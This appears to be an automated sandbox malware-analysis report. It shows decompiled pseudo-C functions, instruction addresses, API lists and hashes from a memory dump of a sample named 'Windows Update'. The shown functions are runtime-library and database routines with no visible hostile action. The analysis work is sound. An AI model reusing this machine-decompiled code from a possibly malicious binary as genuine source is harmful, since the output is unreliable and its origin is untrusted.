                                                                                                                    0x0001f307
                                                                                                                    0x0001f307
                                                                                                                    0x0001f30e
                                                                                                                    0x0001f310
                                                                                                                    0x0001f319
                                                                                                                    0x0001f320
                                                                                                                    0x0001f334
                                                                                                                    0x0001f343
                                                                                                                    0x0001f34d
                                                                                                                    0x0001f352
                                                                                                                    0x0001f359
                                                                                                                    0x0001f363
                                                                                                                    0x0001f37c

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: d9fc15d2961dd4f35383039be6e2641827a6309336160a2c73362129a3b00a7e
                                                                                                                    • Instruction ID: c9fb6744e6a7a7f295d0fd770ca56c3dbf283dbbe8dae04210090849ba064107
                                                                                                                    • Opcode Fuzzy Hash: d9fc15d2961dd4f35383039be6e2641827a6309336160a2c73362129a3b00a7e
                                                                                                                    • Instruction Fuzzy Hash: 2C01D652F41318F3CA1077B95C46EEF379C9B45B20F21822AB92CA20C2D8689400417D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0008305D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0008305D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E000835AA(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E000830E3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0008381F(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00083760(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                                                                    0x00083060
                                                                                                                    0x00083066
                                                                                                                    0x000830d9
                                                                                                                    0x00000000
                                                                                                                    0x0008306d
                                                                                                                    0x0008306d
                                                                                                                    0x00083070
                                                                                                                    0x0008308b
                                                                                                                    0x0008308e
                                                                                                                    0x000830ae
                                                                                                                    0x000830c0
                                                                                                                    0x00083090
                                                                                                                    0x00083090
                                                                                                                    0x00083093
                                                                                                                    0x00000000
                                                                                                                    0x00083095
                                                                                                                    0x000830a7
                                                                                                                    0x000830a7
                                                                                                                    0x00083093
                                                                                                                    0x000830de
                                                                                                                    0x000830e2
                                                                                                                    0x00083072
                                                                                                                    0x0008308a
                                                                                                                    0x0008308a
                                                                                                                    0x00083070

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                    • Instruction ID: c877d5904e2f73bd0662b5aab14722ff1a5bbcb9c798d38009d2127bbb48bed3
                                                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                    • Instruction Fuzzy Hash: 5601407200014EBBCF226E84DC118EE3F63BB58B54B588515FA9859032D736CAB1EF81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00081B47 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 16%
                                                                                                                    			E00081B47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E0008216F(_t27, _t29, _t30, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E0007A397(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E000823D0(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E00081939(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E0007A367(_t25, _t29);
					return _t25;
				}
				return _t25;
			}













                                                                                                                    0x00081b4a
                                                                                                                    0x00081b4f
                                                                                                                    0x00081b52
                                                                                                                    0x00081b54
                                                                                                                    0x00081b57
                                                                                                                    0x00081b5a
                                                                                                                    0x00081b5b
                                                                                                                    0x00081b5e
                                                                                                                    0x00081b63
                                                                                                                    0x00081b63
                                                                                                                    0x00081b66
                                                                                                                    0x00081b6a
                                                                                                                    0x00081b6d
                                                                                                                    0x00081b72
                                                                                                                    0x00081b6f
                                                                                                                    0x00081b6f
                                                                                                                    0x00081b6f
                                                                                                                    0x00081b75
                                                                                                                    0x00081b7a
                                                                                                                    0x00081b7b
                                                                                                                    0x00081b7e
                                                                                                                    0x00081b80
                                                                                                                    0x00081b83
                                                                                                                    0x00081b86
                                                                                                                    0x00081b87
                                                                                                                    0x00081b8f
                                                                                                                    0x00081b94
                                                                                                                    0x00081b98
                                                                                                                    0x00081b9e
                                                                                                                    0x00081ba1
                                                                                                                    0x00081ba4
                                                                                                                    0x00081ba7
                                                                                                                    0x00081ba8
                                                                                                                    0x00081bab
                                                                                                                    0x00081bb6
                                                                                                                    0x00081bba
                                                                                                                    0x00000000
                                                                                                                    0x00081bba
                                                                                                                    0x00081bc1

                                                                                                                    APIs
                                                                                                                    • ___BuildCatchObject.LIBCMT ref: 00081B5E
                                                                                                                      • Part of subcall function 0008216F: ___BuildCatchObjectHelper.LIBCMT ref: 000821A1
                                                                                                                      • Part of subcall function 0008216F: ___AdjustPointer.LIBCMT ref: 000821B8
                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00081B75
                                                                                                                    • ___FrameUnwindToState.LIBCMT ref: 00081B87
                                                                                                                    • CallCatchBlock.LIBCMT ref: 00081BAB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2901542994-0
                                                                                                                    • Opcode ID: e773da7b83a15dac5bc00b18d7fe5226759331699da82cb122417f3b61336208
                                                                                                                    • Instruction ID: d7f58de7f990ef1244566b1170bd5b06ee7026cd5f9ec6562ddb08472f8af8bb
                                                                                                                    • Opcode Fuzzy Hash: e773da7b83a15dac5bc00b18d7fe5226759331699da82cb122417f3b61336208
                                                                                                                    • Instruction Fuzzy Hash: 5A012932400108BBCF12AF55CC01EDE3BBAFF98754F158014F99866121D376E962DBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000FD5F3 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 21%
                                                                                                                    			E000FD5F3(void* __ecx, intOrPtr _a4) {
				intOrPtr _v4;
				void* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t22;

				_t18 = _t20;
				E000FD5C1(__ecx, _a4);
				 *0x474180(_a4, _t17);
				asm("int3");
				_push(_t18);
				L00100ED0(_t22);
				L00100F2D(_t14, _v4);
				E000FD6D4(0xff);
				asm("int3");
				_push(1);
				_push(1);
				_push(0);
				return E000FD770(_t10, _t15, _t16, _t22);
			}












                                                                                                                    0x000fd5f4
                                                                                                                    0x000fd5f9
                                                                                                                    0x000fd602
                                                                                                                    0x000fd608
                                                                                                                    0x000fd609
                                                                                                                    0x000fd60c
                                                                                                                    0x000fd614
                                                                                                                    0x000fd61f
                                                                                                                    0x000fd624
                                                                                                                    0x000fd625
                                                                                                                    0x000fd627
                                                                                                                    0x000fd629
                                                                                                                    0x000fd633

                                                                                                                    APIs
                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 000FD5F9
                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 000FD60C
                                                                                                                      • Part of subcall function 00100ED0: __NMSG_WRITE.LIBCMT ref: 00100EF7
                                                                                                                      • Part of subcall function 00100ED0: __NMSG_WRITE.LIBCMT ref: 00100F01
                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 000FD614
                                                                                                                      • Part of subcall function 00100F2D: ___crtMessageBoxW.LIBCMT ref: 0010106D
                                                                                                                      • Part of subcall function 000FD6D4: _doexit.LIBCMT ref: 000FD6DE
                                                                                                                    • _doexit.LIBCMT ref: 000FD62B
                                                                                                                      • Part of subcall function 000FD770: __lock.LIBCMT ref: 000FD77E
                                                                                                                      • Part of subcall function 000FD770: __initterm.LIBCMT ref: 000FD846
                                                                                                                      • Part of subcall function 000FD770: __initterm.LIBCMT ref: 000FD857
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ___crt__initterm_doexit$ExitMessageProcess__lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1204012526-0
                                                                                                                    • Opcode ID: 0f14dd9de8612eea1653548a99ee9828093b92422875be73fb56978249ac31ab
                                                                                                                    • Instruction ID: 4ae333a0c9f101b2fb5920f11066a8ea48098a06ebd9fb9acf12ee3aaa5d2b0e
                                                                                                                    • Opcode Fuzzy Hash: 0f14dd9de8612eea1653548a99ee9828093b92422875be73fb56978249ac31ab
                                                                                                                    • Instruction Fuzzy Hash: ECE0EC3114430C7BDA153B60FC47FA83A1BDB10B50F800421BB08188E3EFE26A917595
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0004B807 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 425COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E0004B807(signed int _a4, intOrPtr* _a8, intOrPtr* _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char _v44;
				char _v56;
				signed char _v88;
				signed char _v91;
				signed char _v92;
				char _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				intOrPtr _v136;
				signed int _v140;
				intOrPtr* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t131;
				intOrPtr _t139;
				void* _t150;
				void* _t161;
				intOrPtr _t165;
				intOrPtr* _t167;
				intOrPtr* _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t173;
				signed int _t181;
				char* _t183;
				signed int _t184;
				intOrPtr _t187;
				intOrPtr _t189;
				intOrPtr _t191;
				signed int _t194;
				signed int _t195;
				intOrPtr _t197;
				intOrPtr _t200;
				signed int _t209;
				signed int _t210;
				intOrPtr _t211;
				signed char _t212;
				void* _t213;
				intOrPtr* _t214;
				intOrPtr _t221;
				intOrPtr _t222;
				signed short _t225;
				intOrPtr _t226;
				intOrPtr _t229;
				intOrPtr* _t232;
				intOrPtr* _t235;
				intOrPtr* _t239;
				signed int _t240;
				intOrPtr* _t242;
				intOrPtr* _t243;
				signed int _t244;
				signed int _t246;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t255;

				_v8 =  *0x481f80 ^ _t246;
				_t131 = _a4;
				_t243 = _a8;
				_v144 = _a12;
				_v120 = _t131;
				_v116 = _t243;
				_v124 = 0;
				_v112 = 0;
				if(_t131 == 0) {
					L9:
					_v132 = 0;
				} else {
					_t239 = 0x476238;
					while(1) {
						_t240 =  *_t131;
						if(_t240 !=  *_t239) {
							break;
						}
						if(_t240 == 0) {
							L6:
							_t209 = 0;
						} else {
							_t240 =  *((intOrPtr*)(_t131 + 1));
							if(_t240 !=  *((intOrPtr*)(_t239 + 1))) {
								break;
							} else {
								_t131 = _t131 + 2;
								_t239 = _t239 + 2;
								if(_t240 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						_v132 = 1;
						if(_t209 != 0) {
							goto L9;
						}
						goto L10;
					}
					asm("sbb eax, eax");
					_t209 = _t131 | 0x00000001;
					goto L8;
				}
				L10:
				_t210 =  *_t243;
				_v128 = _t210;
				_t242 = E000591B7(0x1c);
				_t248 = _t247 + 4;
				if(_t242 == 0) {
					L17:
					return E000772F2(7, _t210, _v8 ^ _t246, _t240, _t242, _t243);
				} else {
					asm("xorps xmm0, xmm0");
					asm("movq [edi], xmm0");
					asm("movq [edi+0x8], xmm0");
					asm("movq [edi+0x10], xmm0");
					 *((intOrPtr*)(_t242 + 0x18)) = 0;
					 *((char*)(_t242 + 8)) = 0;
					 *_t242 = _t243;
					if(_v132 != 0) {
						L46:
						_t244 = E000591B7(0x50);
						_t249 = _t248 + 4;
						if(_t244 == 0) {
							_t211 = 7;
							goto L88;
						} else {
							E00077C87(_t244, 0, 0x50);
							_t221 = E0005AA87(_t210, _t244, _v120, 0x4c, _a16, _a20);
							_t249 = _t249 + 0x24;
							_v112 = _t221;
							if(_t221 != 0) {
								L84:
								_t211 = _v112;
								goto L85;
							} else {
								_t222 = L0005AFF7( *_t244, 0x64,  &_v108);
								_t249 = _t249 + 0xc;
								_v112 = _t222;
								if(_t222 != 0) {
									goto L84;
								} else {
									 *((intOrPtr*)(_t244 + 4)) = _v116;
									_t150 =  *_t244;
									_t54 = _t244 + 0x14; // 0x14
									_t240 = _t54;
									 *((intOrPtr*)(_t150 + 0x8c)) = 0x416140;
									 *(_t150 + 0x90) = _t244;
									 *(_t242 + 4) = _t244;
									 *((intOrPtr*)( *_t244 + 0x94)) = 0x4240d0;
									 *((intOrPtr*)(_t244 + 8)) = _t222;
									 *((intOrPtr*)(_t244 + 0xc)) = _t222;
									 *((char*)(_t244 + 0x10)) =  *((intOrPtr*)( *_t244 + 0xc));
									_t225 = (_v92 & 0x000000ff) << 0x00000008 | _v91 & 0x000000ff;
									 *_t240 = _t225;
									if(_t225 < 0x200 || _t225 > 0x8000 || (_t225 & 0x0000ffff & (_t225 & 0x0000ffff) - 0x00000001) != 0) {
										 *_t240 = 0;
										if(_v120 != 0 && _v132 == 0) {
											 *((short*)(_t244 + 0x12)) = 0;
										}
										_t212 = 0;
									} else {
										_t212 = _v88;
										 *((char*)(_t244 + 0x11)) = 1;
										 *((char*)(_t244 + 0x12)) = E00055BC7( &_v56) & 0xffffff00 | _t178 != 0x00000000;
										_t181 = E00055BC7( &_v44);
										_t249 = _t249 + 8;
										 *((char*)(_t244 + 0x13)) = _t181 & 0xffffff00 | _t181 != 0x00000000;
										_t78 = _t244 + 0x14; // 0x14
										_t240 = _t78;
									}
									_t226 = E0005B197( *_t244, _t240, _t212 & 0x000000ff);
									_t249 = _t249 + 0xc;
									_v112 = _t226;
									if(_t226 != 0) {
										goto L84;
									} else {
										 *((short*)(_t244 + 0x16)) =  *(_t244 + 0x14) - (_t212 & 0x000000ff);
										if( *((char*)(_t242 + 9)) == 0) {
											goto L83;
										} else {
											 *((intOrPtr*)(_t244 + 0x38)) = 1;
											if( *0x48180c != 0) {
												_t161 =  *0x481848(2);
												_t249 = _t249 + 4;
												_t213 = _t161;
												if( *0x48180c == 0) {
													goto L62;
												} else {
													_t173 =  *0x481848(0);
													_t249 = _t249 + 4;
													 *((intOrPtr*)(_t244 + 0x30)) = _t173;
													if(_t173 != 0) {
														goto L62;
													} else {
														_t100 = _t173 + 7; // 0x7
														_t211 = _t100;
														 *((char*)(_v116 + 0x1e)) = 0;
														L85:
														_t145 =  *_t244;
														if( *_t244 != 0) {
															E0005A4B7(_t211, _t242, _t145);
															_t249 = _t249 + 4;
														}
														L88:
														E00027247(_t244);
														E00027247(_t242);
														 *_v144 = 0;
													}
												}
											} else {
												_t213 = 0;
												L62:
												E00025CF7(_t213);
												 *(_t244 + 0x3c) =  *0x487010;
												 *0x487010 = _t244;
												E00025D37(_t213);
												goto L63;
											}
										}
									}
								}
							}
						}
						goto L89;
					} else {
						_t183 = _v120;
						if(_t183 == 0 ||  *_t183 == 0 ||  *0x4818bc == 0) {
							goto L46;
						} else {
							_t19 = _t210 + 8; // 0x7
							_t243 =  *_t19 + 1;
							_t184 = E000591B7(_t243);
							 *((char*)(_t242 + 9)) = 1;
							 *(_v116 + 0xc) =  *(_v116 + 0xc) | 0x00080000;
							_t252 = _t248 + 4;
							_v140 = _t184;
							if(_t184 != 0) {
								_t26 = _t210 + 0x24; // 0x8468b00
								 *((intOrPtr*)( *_t26))(_t210, _v120, _t243, _t184);
								_t253 = _t252 + 0x10;
								if( *0x48180c != 0) {
									_t187 =  *0x481848(4);
									_t253 = _t253 + 4;
								} else {
									_t187 = 0;
								}
								_v124 = _t187;
								E00025CF7(_t187);
								_t254 = _t253 + 4;
								if( *0x48180c != 0) {
									_t189 =  *0x481848(2);
									_t254 = _t254 + 4;
								} else {
									_t189 = 0;
								}
								_v136 = _t189;
								E00025CF7(_t189);
								_t244 =  *0x487010;
								_t255 = _t254 + 4;
								if(_t244 == 0) {
									L43:
									_t191 = _v136;
									if(_t191 != 0) {
										 *0x481858(_t191);
										_t255 = _t255 + 4;
									}
									E00027247(_v140);
									if(_t244 != 0) {
										L63:
										if( *((char*)(_t242 + 9)) == 0) {
											L83:
											_t211 = _v112;
											 *_v144 = _t242;
										} else {
											_t165 = _v116;
											_t240 = 0;
											_t244 =  *(_t165 + 4);
											if(_t244 <= 0) {
												goto L83;
											} else {
												_t167 =  *((intOrPtr*)(_t165 + 8)) + 4;
												while(1) {
													_t229 =  *_t167;
													if(_t229 != 0 &&  *((char*)(_t229 + 9)) != 0) {
														break;
													}
													_t240 = _t240 + 1;
													_t167 = _t167 + 0x10;
													if(_t240 < _t244) {
														continue;
													} else {
														_t211 = _v112;
														 *_v144 = _t242;
													}
													goto L89;
												}
												_t169 = _t229 + 0x18;
												while( *((intOrPtr*)(_t229 + 0x18)) != 0) {
													_t229 =  *_t169;
													_t169 = _t229 + 0x18;
												}
												_t240 =  *(_t242 + 4);
												if(_t240 >=  *((intOrPtr*)(_t229 + 4))) {
													if( *((intOrPtr*)(_t229 + 0x14)) != 0) {
														while(1) {
															_t171 =  *((intOrPtr*)(_t229 + 0x14));
															if( *((intOrPtr*)(_t171 + 4)) >= _t240) {
																goto L80;
															}
															_t229 = _t171;
															if( *((intOrPtr*)(_t229 + 0x14)) != 0) {
																continue;
															}
															goto L80;
														}
													}
													L80:
													_t170 =  *((intOrPtr*)(_t229 + 0x14));
													 *((intOrPtr*)(_t242 + 0x14)) = _t170;
													 *((intOrPtr*)(_t242 + 0x18)) = _t229;
													if(_t170 != 0) {
														 *((intOrPtr*)(_t170 + 0x18)) = _t242;
													}
													 *((intOrPtr*)(_t229 + 0x14)) = _t242;
													goto L83;
												} else {
													_t211 = _v112;
													 *((intOrPtr*)(_t242 + 0x14)) = _t229;
													 *((intOrPtr*)(_t242 + 0x18)) = 0;
													 *((intOrPtr*)(_t229 + 0x18)) = _t242;
													 *_v144 = _t242;
												}
											}
										}
									} else {
										goto L46;
									}
									L89:
									_t139 = _v124;
									if(_t139 != 0) {
										 *0x481858(_t139);
									}
									return E000772F2(_t211, _t211, _v8 ^ _t246, _t240, _t242, _t244);
								} else {
									do {
										_t214 =  *_t244;
										_t194 = _v140;
										_t31 = _t214 + 0x84; // 0xe8560001
										_t232 =  *_t31;
										while(1) {
											_t240 =  *_t194;
											if(_t240 !=  *_t232) {
												break;
											}
											if(_t240 == 0) {
												L30:
												_t195 = 0;
											} else {
												_t240 =  *((intOrPtr*)(_t194 + 1));
												if(_t240 !=  *((intOrPtr*)(_t232 + 1))) {
													break;
												} else {
													_t194 = _t194 + 2;
													_t232 = _t232 + 2;
													if(_t240 != 0) {
														continue;
													} else {
														goto L30;
													}
												}
											}
											L32:
											if(_t195 != 0 ||  *_t214 != _v128) {
												goto L34;
											} else {
												_t197 = _v116;
												_t240 =  *((intOrPtr*)(_t197 + 4)) - 1;
												if(_t240 < 0) {
													L41:
													 *(_t242 + 4) = _t244;
													 *((intOrPtr*)(_t244 + 0x38)) =  *((intOrPtr*)(_t244 + 0x38)) + 1;
													L42:
													_t210 = _v128;
													goto L43;
												} else {
													_t235 = (_t240 << 4) +  *((intOrPtr*)(_t197 + 8)) + 4;
													while(1) {
														_t200 =  *_t235;
														if(_t200 != 0 &&  *((intOrPtr*)(_t200 + 4)) == _t244) {
															break;
														}
														_t235 = _t235 - 0x10;
														_t240 = _t240 - 1;
														if(_t240 >= 0) {
															continue;
														} else {
															goto L41;
														}
														goto L92;
													}
													E00025D37(_v136);
													E00025D37(_v124);
													E00027247(_v140);
													E00027247(_t242);
													return E000772F2(0x13, _t214, _v8 ^ _t246, _t240, _t242, _t244);
												}
											}
											goto L92;
										}
										asm("sbb eax, eax");
										_t195 = _t194 | 0x00000001;
										goto L32;
										L34:
										_t244 =  *(_t244 + 0x3c);
									} while (_t244 != 0);
									goto L42;
								}
							} else {
								E00027247(_t242);
								goto L17;
							}
						}
					}
				}
				L92:
			}




































































                                                                                                                    0x0004b817
                                                                                                                    0x0004b81d
                                                                                                                    0x0004b822
                                                                                                                    0x0004b825
                                                                                                                    0x0004b82e
                                                                                                                    0x0004b831
                                                                                                                    0x0004b834
                                                                                                                    0x0004b837
                                                                                                                    0x0004b83c
                                                                                                                    0x0004b877
                                                                                                                    0x0004b877
                                                                                                                    0x0004b83e
                                                                                                                    0x0004b83e
                                                                                                                    0x0004b847
                                                                                                                    0x0004b847
                                                                                                                    0x0004b84b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b84f
                                                                                                                    0x0004b863
                                                                                                                    0x0004b863
                                                                                                                    0x0004b851
                                                                                                                    0x0004b851
                                                                                                                    0x0004b857
                                                                                                                    0x00000000
                                                                                                                    0x0004b859
                                                                                                                    0x0004b859
                                                                                                                    0x0004b85c
                                                                                                                    0x0004b861
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b861
                                                                                                                    0x0004b857
                                                                                                                    0x0004b86c
                                                                                                                    0x0004b86c
                                                                                                                    0x0004b875
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0004b875
                                                                                                                    0x0004b867
                                                                                                                    0x0004b869
                                                                                                                    0x00000000
                                                                                                                    0x0004b869
                                                                                                                    0x0004b87e
                                                                                                                    0x0004b87e
                                                                                                                    0x0004b882
                                                                                                                    0x0004b88a
                                                                                                                    0x0004b88c
                                                                                                                    0x0004b891
                                                                                                                    0x0004b90c
                                                                                                                    0x0004b91f
                                                                                                                    0x0004b893
                                                                                                                    0x0004b897
                                                                                                                    0x0004b89a
                                                                                                                    0x0004b89e
                                                                                                                    0x0004b8a3
                                                                                                                    0x0004b8a8
                                                                                                                    0x0004b8af
                                                                                                                    0x0004b8b3
                                                                                                                    0x0004b8b5
                                                                                                                    0x0004ba2f
                                                                                                                    0x0004ba36
                                                                                                                    0x0004ba38
                                                                                                                    0x0004ba3d
                                                                                                                    0x0004bce3
                                                                                                                    0x00000000
                                                                                                                    0x0004ba43
                                                                                                                    0x0004ba48
                                                                                                                    0x0004ba5f
                                                                                                                    0x0004ba61
                                                                                                                    0x0004ba64
                                                                                                                    0x0004ba69
                                                                                                                    0x0004bccf
                                                                                                                    0x0004bccf
                                                                                                                    0x00000000
                                                                                                                    0x0004ba6f
                                                                                                                    0x0004ba7c
                                                                                                                    0x0004ba7e
                                                                                                                    0x0004ba81
                                                                                                                    0x0004ba86
                                                                                                                    0x00000000
                                                                                                                    0x0004ba8c
                                                                                                                    0x0004ba8f
                                                                                                                    0x0004ba92
                                                                                                                    0x0004ba94
                                                                                                                    0x0004ba94
                                                                                                                    0x0004ba97
                                                                                                                    0x0004baa1
                                                                                                                    0x0004baa7
                                                                                                                    0x0004baac
                                                                                                                    0x0004bab8
                                                                                                                    0x0004babb
                                                                                                                    0x0004bac1
                                                                                                                    0x0004bad0
                                                                                                                    0x0004bad8
                                                                                                                    0x0004bade
                                                                                                                    0x0004bb6a
                                                                                                                    0x0004bb70
                                                                                                                    0x0004bb77
                                                                                                                    0x0004bb77
                                                                                                                    0x0004bb7b
                                                                                                                    0x0004baf8
                                                                                                                    0x0004baf8
                                                                                                                    0x0004baff
                                                                                                                    0x0004bb0d
                                                                                                                    0x0004bb14
                                                                                                                    0x0004bb19
                                                                                                                    0x0004bb21
                                                                                                                    0x0004bb24
                                                                                                                    0x0004bb24
                                                                                                                    0x0004bb24
                                                                                                                    0x0004bb89
                                                                                                                    0x0004bb8b
                                                                                                                    0x0004bb8e
                                                                                                                    0x0004bb93
                                                                                                                    0x00000000
                                                                                                                    0x0004bb99
                                                                                                                    0x0004bba3
                                                                                                                    0x0004bbab
                                                                                                                    0x00000000
                                                                                                                    0x0004bbb1
                                                                                                                    0x0004bbb8
                                                                                                                    0x0004bbbf
                                                                                                                    0x0004bc2d
                                                                                                                    0x0004bc33
                                                                                                                    0x0004bc3d
                                                                                                                    0x0004bc3f
                                                                                                                    0x00000000
                                                                                                                    0x0004bc41
                                                                                                                    0x0004bc43
                                                                                                                    0x0004bc49
                                                                                                                    0x0004bc4c
                                                                                                                    0x0004bc51
                                                                                                                    0x00000000
                                                                                                                    0x0004bc57
                                                                                                                    0x0004bc57
                                                                                                                    0x0004bc57
                                                                                                                    0x0004bc5d
                                                                                                                    0x0004bcd2
                                                                                                                    0x0004bcd2
                                                                                                                    0x0004bcd6
                                                                                                                    0x0004bcd9
                                                                                                                    0x0004bcde
                                                                                                                    0x0004bcde
                                                                                                                    0x0004bce8
                                                                                                                    0x0004bce9
                                                                                                                    0x0004bcef
                                                                                                                    0x0004bcfd
                                                                                                                    0x0004bcfd
                                                                                                                    0x0004bc51
                                                                                                                    0x0004bbc1
                                                                                                                    0x0004bbc1
                                                                                                                    0x0004bbc3
                                                                                                                    0x0004bbc4
                                                                                                                    0x0004bbcf
                                                                                                                    0x0004bbd2
                                                                                                                    0x0004bbd8
                                                                                                                    0x00000000
                                                                                                                    0x0004bbdd
                                                                                                                    0x0004bbbf
                                                                                                                    0x0004bbab
                                                                                                                    0x0004bb93
                                                                                                                    0x0004ba86
                                                                                                                    0x0004ba69
                                                                                                                    0x00000000
                                                                                                                    0x0004b8bb
                                                                                                                    0x0004b8bb
                                                                                                                    0x0004b8c0
                                                                                                                    0x00000000
                                                                                                                    0x0004b8dc
                                                                                                                    0x0004b8dc
                                                                                                                    0x0004b8df
                                                                                                                    0x0004b8e1
                                                                                                                    0x0004b8e9
                                                                                                                    0x0004b8ed
                                                                                                                    0x0004b8f4
                                                                                                                    0x0004b8f7
                                                                                                                    0x0004b8ff
                                                                                                                    0x0004b921
                                                                                                                    0x0004b929
                                                                                                                    0x0004b92b
                                                                                                                    0x0004b935
                                                                                                                    0x0004b93d
                                                                                                                    0x0004b943
                                                                                                                    0x0004b937
                                                                                                                    0x0004b937
                                                                                                                    0x0004b937
                                                                                                                    0x0004b947
                                                                                                                    0x0004b94a
                                                                                                                    0x0004b94f
                                                                                                                    0x0004b959
                                                                                                                    0x0004b961
                                                                                                                    0x0004b967
